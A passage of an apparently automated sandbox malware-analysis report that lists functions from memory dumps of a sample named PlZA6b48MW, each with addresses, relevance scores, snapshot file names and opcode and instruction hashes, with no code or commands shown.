                                                                            • Instruction ID: 340921155e10495ef61b338fbd1f43965e29a0d8b7de05c097d85df4edc2e77e
                                                                            • Opcode Fuzzy Hash: a740e1ec56bbb9088af0989fa77e2c33e66e0537d5d755b53a9ec9775ec2cca3
                                                                            • Instruction Fuzzy Hash: 83E06D61A0F7C44FC71AAB748869454BFA0EF6720174A52EEC045CF1A3EA2D8889CB01
                                                                            Function 00007FFD9B8BB159 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M
                                                                            • API String ID: 0-3664761504
                                                                            • Opcode ID: 895d405751173384833ba20ad23c7eb90c38cd7c6bf408977422b19cb3cf1ce1
                                                                            • Instruction ID: f87a5eff0510c62cfe9076142d8dba8ed0ad0b29998d5f631a814e4abe190192
                                                                            • Opcode Fuzzy Hash: 895d405751173384833ba20ad23c7eb90c38cd7c6bf408977422b19cb3cf1ce1
                                                                            • Instruction Fuzzy Hash: 74E06D3064E3C44FC71AAB3488698547F60EE6721134A42EFC445CF1A3DA2D888ACB11
                                                                            Function 00007FFD9B8B2899 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M
                                                                            • API String ID: 0-3664761504
                                                                            • Opcode ID: f0677b7bbc688d57e075adbe3dc088405d590d17517c6c64e1e9f3f73fb9d4cd
                                                                            • Instruction ID: 664272f955290ce120fe354720f4aab8d0a15ad7283893d5a154e606be5b90b1
                                                                            • Opcode Fuzzy Hash: f0677b7bbc688d57e075adbe3dc088405d590d17517c6c64e1e9f3f73fb9d4cd
                                                                            • Instruction Fuzzy Hash: 01E06D3060A3804FCB1AEB348468855BF60EF6720174A42EEC056CB1A7DA2DD886CB41
                                                                            Function 00007FFD9B8B2F29 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: I
                                                                            • API String ID: 0-3707901625
                                                                            • Opcode ID: 556e3e425304316e7c1afa5556a8a27e0a9bcba6a5ebda62b54a1ba1c29d09d6
                                                                            • Instruction ID: 70d4ab1f88c64f492ea838151c9851ff305c470dd881b3ac0311ede5c74ec474
                                                                            • Opcode Fuzzy Hash: 556e3e425304316e7c1afa5556a8a27e0a9bcba6a5ebda62b54a1ba1c29d09d6
                                                                            • Instruction Fuzzy Hash: A6E0E56154F3D44FCB56AB7588668443FA0AE6B25078B42EAC085CF1F3E629984ACB11
                                                                            Function 00007FFD9B893B59 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M
                                                                            • API String ID: 0-3664761504
                                                                            • Opcode ID: 9768825aa0afe0cac63e407d65c54f5a4e50f64c2ea36600848f6e0cc6421e46
                                                                            • Instruction ID: 1fb261ecc66a7b163f4b057241092078cfc30a656b2c0142c6f72c6fb3c4569b
                                                                            • Opcode Fuzzy Hash: 9768825aa0afe0cac63e407d65c54f5a4e50f64c2ea36600848f6e0cc6421e46
                                                                            • Instruction Fuzzy Hash: ACE09271A0E7C48FCB16EB788868454BFA1EF6721174A41EFC086CF1A3EA2DC885C701
                                                                            Function 00007FFD9B8B4959 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: I
                                                                            • API String ID: 0-3707901625
                                                                            • Opcode ID: 500a454aeb7b8217c4b82240f445a0e1efd35b5d461e36da9ba8d5cb9b6d5251
                                                                            • Instruction ID: 49ffc727a4eecb58c421898807ba9b8ba5e1b412ae98bdadf7915142255fb363
                                                                            • Opcode Fuzzy Hash: 500a454aeb7b8217c4b82240f445a0e1efd35b5d461e36da9ba8d5cb9b6d5251
                                                                            • Instruction Fuzzy Hash: EFE0E56154F7D44FCB16AB75886A8497FA1AE6B21078A41EEC086CF1B3E6299849C701
                                                                            Function 00007FFD9B893BE9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: I
                                                                            • API String ID: 0-3707901625
                                                                            • Opcode ID: e7ada0b23aaa033badc2362ad47223f9e443d77f1be492f43389db49ad523153
                                                                            • Instruction ID: f71238f4bdeb26c982dff4ddbf311331bcbd093b12398d51497ce4edbc060eb2
                                                                            • Opcode Fuzzy Hash: e7ada0b23aaa033badc2362ad47223f9e443d77f1be492f43389db49ad523153
                                                                            • Instruction Fuzzy Hash: 22E0E57154F3D44FCB16AB7488668493FA0AE6B21178A41EEC189CF1F3E6299889C701
                                                                            Function 00007FFD9B8B2929 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: I
                                                                            • API String ID: 0-3707901625
                                                                            • Opcode ID: e6d44813eb3488264c4356b198eaa2f72a3b982d87985ff6bf74b5178c74cf89
                                                                            • Instruction ID: 8508d6c1a84792911da49d55c7410654d3a21446920c90e130b4aa38460551e3
                                                                            • Opcode Fuzzy Hash: e6d44813eb3488264c4356b198eaa2f72a3b982d87985ff6bf74b5178c74cf89
                                                                            • Instruction Fuzzy Hash: 52E01A6154F7D44FCB16EB7488698447FA0AE6B21178B41EEC089CF1B3E62D8849CB11
                                                                            Function 00007FFD9B8BB699 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: I
                                                                            • API String ID: 0-3707901625
                                                                            • Opcode ID: 2c62b76faf83bbdb87f6c4ba0200dfd286ad871b4d0b64a5c0891d3f2f3b2084
                                                                            • Instruction ID: 66dece9ca908f9e4a5a1e755d15f3a266b3b81b52a335747cbb6bf3c51244093
                                                                            • Opcode Fuzzy Hash: 2c62b76faf83bbdb87f6c4ba0200dfd286ad871b4d0b64a5c0891d3f2f3b2084
                                                                            • Instruction Fuzzy Hash: FAE01A6054E3C04FCB06EB7488798453F609E6721178B41EEC089CF1B3E62E8949C712
                                                                            Function 00007FFD9B8B8E0A Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: I
                                                                            • API String ID: 0-3707901625
                                                                            • Opcode ID: 19dbaea44153af380905fcfdd7056358f070803d88dd75afee91a1b3d4d38c00
                                                                            • Instruction ID: 7b078bbb8d8508728165271e17e07a4c91195871bd4aabee4ad483d134082220
                                                                            • Opcode Fuzzy Hash: 19dbaea44153af380905fcfdd7056358f070803d88dd75afee91a1b3d4d38c00
                                                                            • Instruction Fuzzy Hash: F2D05E7154B6A44FCF18EF79846AC147F90EF6A34078A45ECC04ACF1B2EA29D986CB40
                                                                            Function 00007FFD9BC73441 Relevance: .4, Instructions: 409COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d8f3ea31ccf1bc8807f6757ffa5e9c814f991623e3e7a2f58a230c299ebc9de4
                                                                            • Instruction ID: cfe8058985271456fdc0707f1e5307788d98172be9ef700b05ddc670c376bb10
                                                                            • Opcode Fuzzy Hash: d8f3ea31ccf1bc8807f6757ffa5e9c814f991623e3e7a2f58a230c299ebc9de4
                                                                            • Instruction Fuzzy Hash: 6BD1E330B0EA4A4FD368DBB8D4E157877E1FF84300B1545BEC48E876A2DA29BA428741
                                                                            Function 00007FFD9B8C0F89 Relevance: .3, Instructions: 334COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c01ca6045a85f2e92532aa7843cebd4f2e019e872129ac3f69a7b1df07461aef
                                                                            • Instruction ID: 5e40fdba72a922ab546a043557d1e12899e0b7accc1f24451be1802be43a6da3
                                                                            • Opcode Fuzzy Hash: c01ca6045a85f2e92532aa7843cebd4f2e019e872129ac3f69a7b1df07461aef
                                                                            • Instruction Fuzzy Hash: 1A910772B1DA4D4FEFA8FB5C94A5AB877E1EF98740B11017BD00DC7292DE24AD428780
                                                                            Function 00007FFD9BC76CC2 Relevance: .3, Instructions: 308COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bc61288149f69b6c8a46b52ceebb388e9597ec21b35398ccbf8216dace28806c
                                                                            • Instruction ID: f3ffe79c63c3b5e236299ae064d8f7d7fa184560b75e07137dd668bf93fc923b
                                                                            • Opcode Fuzzy Hash: bc61288149f69b6c8a46b52ceebb388e9597ec21b35398ccbf8216dace28806c
                                                                            • Instruction Fuzzy Hash: 4AB1D430719A4A8FE759DF78C0E06A8B7A1FF58300F5581B9D04EC7A96DB28F951CB90
                                                                            Function 00007FFD9BC71CB2 Relevance: .3, Instructions: 306COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c8d592c9a6793603d16bfb55011be85d3da2c05234d1b6b7e29b25417f9798b4
                                                                            • Instruction ID: 2f5d468f000c8a90f8a0a2ef3ac9606d5029cdf0b683a5d40a73effb1b9a131a
                                                                            • Opcode Fuzzy Hash: c8d592c9a6793603d16bfb55011be85d3da2c05234d1b6b7e29b25417f9798b4
                                                                            • Instruction Fuzzy Hash: 55B1C430B19A4A4FE359DF68C0E16A8B7A1FF59310F5581B9C04EC7A97DB28F951CB80
                                                                            Function 00007FFD9B8C0678 Relevance: .3, Instructions: 277COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a2d27b31ca88ffa70e6b46bace46fe5c4286b5b7c4fa5af40b14468d953db5b1
                                                                            • Instruction ID: d7dd097f0b1e496dcf01a2a2b5f5c76d34bd72f86cea77fd51546a2a68d73c70
                                                                            • Opcode Fuzzy Hash: a2d27b31ca88ffa70e6b46bace46fe5c4286b5b7c4fa5af40b14468d953db5b1
                                                                            • Instruction Fuzzy Hash: 8971B27171DA0A4FE768FB58E8919B1B3D2FF9931071502BAD04EC35A6EE25F8428781
                                                                            Function 00007FFD9BC711E6 Relevance: .3, Instructions: 269COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ab9958060e7da5888f853a4ac8e3c97bf855e19c8895abc03e2505723f101fdd
                                                                            • Instruction ID: 86e8ba5aab3a851687eeb58eee86d827ddf9cae75f1e5f2be75d2fc7dca3f4d6
                                                                            • Opcode Fuzzy Hash: ab9958060e7da5888f853a4ac8e3c97bf855e19c8895abc03e2505723f101fdd
                                                                            • Instruction Fuzzy Hash: C4816831B0EA0A4FE3789A7894A54BC77E0FF85351B16017ED48FC35A3DE28BA028341
                                                                            Function 00007FFD9B8C0DAD Relevance: .3, Instructions: 262COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d295b9317c061fc977883a3760d5daf35d4b2e9a325c8c54ab89274d6ac845ca
                                                                            • Instruction ID: 92e27fe093d61033d29a8caddbd62e007156a7f472832e997411c114d53a7f95
                                                                            • Opcode Fuzzy Hash: d295b9317c061fc977883a3760d5daf35d4b2e9a325c8c54ab89274d6ac845ca
                                                                            • Instruction Fuzzy Hash: D6612B62B2EE4E0FE7A9A76C983157577E1FF9979070502FBD04DC31A6DE14AD024341
                                                                            Function 00007FFD9BC74339 Relevance: .3, Instructions: 255COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5a0d0122761a7136d0b4e57333a511aac9d919a80f89537a37e1348684fbe27b
                                                                            • Instruction ID: afefe805703cb51a407e59f10607a43337802b53257e573d24e25e7c679bf971
                                                                            • Opcode Fuzzy Hash: 5a0d0122761a7136d0b4e57333a511aac9d919a80f89537a37e1348684fbe27b
                                                                            • Instruction Fuzzy Hash: 64710535B0E54D5FE778DA7888B65BC37C0FF44311B2602BDD49EC75B2DA28AA068781
                                                                            Function 00007FFD9B8C133D Relevance: .2, Instructions: 235COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 545d9c5dda2c18308a00e193af3d84414f59be5bca1acada50498c76e97ecd0c
                                                                            • Instruction ID: 1930148e916b7f8c1e324b0f7efe8ad4224295e1826700cf2bc4e5282fe8a232
                                                                            • Opcode Fuzzy Hash: 545d9c5dda2c18308a00e193af3d84414f59be5bca1acada50498c76e97ecd0c
                                                                            • Instruction Fuzzy Hash: 2661E471719E0A4FDBA9FB5894A1971B3E2FF6871071502BAD04EC76A6DE24FC428780
                                                                            Function 00007FFD9BC78451 Relevance: .2, Instructions: 194COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8eaa318fd977cf4d349bbfdc62bf7a4206e7440e893e87480b036a32f58c9deb
                                                                            • Instruction ID: 12f73798047f268c896fcab3bc2f28481c99e5ab5ec74c39b6aae539cf826e84
                                                                            • Opcode Fuzzy Hash: 8eaa318fd977cf4d349bbfdc62bf7a4206e7440e893e87480b036a32f58c9deb
                                                                            • Instruction Fuzzy Hash: E761F53060AB0A8FE3A8DB65C1E05B5B7E1FF44310B55457EC18AC7AA2DB78F942CB40
                                                                            Function 00007FFD9B8BED41 Relevance: .2, Instructions: 188COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b8a029323467761e87bc1c2ae1c85ba552ed66a0447660c9c1d48172a964fff1
                                                                            • Instruction ID: 6f856e677a09d7767d9be0e2fbda654c82a12af767410db0be7249e0262c12ab
                                                                            • Opcode Fuzzy Hash: b8a029323467761e87bc1c2ae1c85ba552ed66a0447660c9c1d48172a964fff1
                                                                            • Instruction Fuzzy Hash: DF512A32A0D96D4FEBA9E768C4657A877E1EF98311F0501BAD40DC36E2DE286D058BC0
                                                                            Function 00007FFD9B8BDB08 Relevance: .2, Instructions: 185COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 80239ef48691eabd0a9ae89ca98fc4d62579edae1e2e4eecb211414fd5ec761c
                                                                            • Instruction ID: 05bd383366237c752111d208da59c4cf09268a487b5941c4b5d88713393dc9df
                                                                            • Opcode Fuzzy Hash: 80239ef48691eabd0a9ae89ca98fc4d62579edae1e2e4eecb211414fd5ec761c
                                                                            • Instruction Fuzzy Hash: 2F51D331E09A1E4BEB58CBA888755BDB7E2FF8C304F15017AE05DE3292CB346901CB91
                                                                            Function 00007FFD9B8B829F Relevance: .2, Instructions: 179COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 13ff64d179ad01d738fceaf73a7d792a6d1b7ab9f060b110375308a56cf850ac
                                                                            • Instruction ID: 60d48562f5e81e4b61f1d3524195654325d5b7d20358cd029ca3789c485ecb09
                                                                            • Opcode Fuzzy Hash: 13ff64d179ad01d738fceaf73a7d792a6d1b7ab9f060b110375308a56cf850ac
                                                                            • Instruction Fuzzy Hash: 5151B130B089198FEB68EB68C8A5A7573D2FF88314F150179D40E872D6CE39BD42CB91
                                                                            Function 00007FFD9B8C4440 Relevance: .2, Instructions: 171COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 02e2a5207559c301237cb1308021667ab1dd7dbd93a266062d1ef76cdd3ed829
                                                                            • Instruction ID: 529a5b7d67576e1cb87be4a3de23209ac4f60c140e8723c2e7a9a0e4c9cc79ae
                                                                            • Opcode Fuzzy Hash: 02e2a5207559c301237cb1308021667ab1dd7dbd93a266062d1ef76cdd3ed829
                                                                            • Instruction Fuzzy Hash: 02412361B4EA4D0FE7A8B7A858761757BD1EF9C210F0501BBE04DC32E3ED186D068342
                                                                            Function 00007FFD9BC74EFB Relevance: .2, Instructions: 166COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c49bf03d33a348185d45a2d761e4dd2aa2c5b57fd40ea4c21ca161bc58625f93
                                                                            • Instruction ID: 3430eb8036613bd7b09b04105418892191f30a4f42896d204f0907b72fa17199
                                                                            • Opcode Fuzzy Hash: c49bf03d33a348185d45a2d761e4dd2aa2c5b57fd40ea4c21ca161bc58625f93
                                                                            • Instruction Fuzzy Hash: 3151BF30E1A64E9EEB69DBB4C8A49BCBBB0FF45300F5105B9D01ED71E6DA386A41C741
                                                                            Function 00007FFD9BC7260F Relevance: .2, Instructions: 152COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8ad709f1d1ed89bb7529bb1b6c53ec4aeb98616f063db36b7fbf7a6d64308f57
                                                                            • Instruction ID: 9d574ec6c03e3507c4976dc941b1b9741fc4975784146cb2ff4c678f1736f34a
                                                                            • Opcode Fuzzy Hash: 8ad709f1d1ed89bb7529bb1b6c53ec4aeb98616f063db36b7fbf7a6d64308f57
                                                                            • Instruction Fuzzy Hash: D551C33051A6498FE749CF58C0E06B47BA1FF46310B9411FDC84ACF69BD768E482CB41
                                                                            Function 00007FFD9BC7761F Relevance: .1, Instructions: 149COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 114644d45cd222c3022d99dc3081a528b0632b0cef91774da554dcf2587c4110
                                                                            • Instruction ID: 65508b981a1a4cda25c32ef02c5da19b532a03fe32e55f3a5545adf57a043555
                                                                            • Opcode Fuzzy Hash: 114644d45cd222c3022d99dc3081a528b0632b0cef91774da554dcf2587c4110
                                                                            • Instruction Fuzzy Hash: 3251C7305196498FEB89CF28C0E06B43BA5FF45314B9555FEC85ACB69BD778E482CB40
                                                                            Function 00007FFD9BC76244 Relevance: .1, Instructions: 145COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b467bf935c74c7b37bdc04dd2739915e221ce48149003c781432eacbdc93d6a2
                                                                            • Instruction ID: b5dea82e25917f60685002dad68310c6774c8de475704bb4c285c4bc98e6039e
                                                                            • Opcode Fuzzy Hash: b467bf935c74c7b37bdc04dd2739915e221ce48149003c781432eacbdc93d6a2
                                                                            • Instruction Fuzzy Hash: 6441E831B1E70A4FE3789F68A4A14BCB7E1FF41310B16057EE09AC75A3DA29B606C741
                                                                            Function 00007FFD9BC79BE9 Relevance: .1, Instructions: 139COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dfc6b6e555292e7ea90b23cb83de15e2efc5537fb544464c4d4d043b583cbd48
                                                                            • Instruction ID: 266db6322b5d9e0cd9e5c4470d43a4c25757a1f3be60d8d5aebe9792d42bb04c
                                                                            • Opcode Fuzzy Hash: dfc6b6e555292e7ea90b23cb83de15e2efc5537fb544464c4d4d043b583cbd48
                                                                            • Instruction Fuzzy Hash: 9E41E621B0995D5FEBACF7A888BA77822D2EFAC311F550175D00DC32E6DD2C6D418751
                                                                            Function 00007FFD9B8808E8 Relevance: .1, Instructions: 133COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d7c8af078bb74ded600dbc7b857b07d3eac4925ae80691c7ce74143467092594
